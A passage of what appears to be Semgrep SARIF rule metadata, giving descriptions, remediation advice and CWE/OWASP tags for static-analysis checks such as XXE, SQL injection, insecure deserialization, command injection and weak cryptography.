[https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"help":{"markdown":"Detected possible formatted SQL query. Use parameterized queries instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query)\n - [https://stackoverflow.com/questions/775296/mysql-parameterized-queries](https://stackoverflow.com/questions/775296/mysql-parameterized-queries)\n","text":"Detected possible formatted SQL query. Use parameterized queries instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query","id":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","name":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.formatted-sql-query.formatted-sql-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"help":{"markdown":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","id":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","name":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-redirect-to.check-redirect-to"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"help":{"markdown":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file)\n - [https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions](https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions)\n","text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file","id":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","name":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.filesystem.world-writable-file.world-writable-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1","id":"clojure.lang.security.use-of-sha1.use-of-sha1","name":"clojure.lang.security.use-of-sha1.use-of-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-sha1.use-of-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"help":{"markdown":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","id":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","name":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"help":{"markdown":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec)\n","text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","id":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","name":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","properties":{"precision":"very-high","tags":["CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')","CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","id":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","name":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","id":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","name":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask)\n - [https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command](https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","id":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","name":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","id":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","name":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask","id":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","name":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-flask.sqlalchemy-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"help":{"markdown":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message)\n - [https://www.damonkohler.com/2008/12/email-injection.html](https://www.damonkohler.com/2008/12/email-injection.html)\n","text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","id":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","name":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","properties":{"precision":"very-high","tags":["CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"help":{"markdown":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption](https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption)\n - [https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0](https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0)\n","text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","id":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","name":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Facebook OAuth detected"},"help":{"markdown":"Facebook OAuth detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Facebook OAuth detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","id":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","name":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: 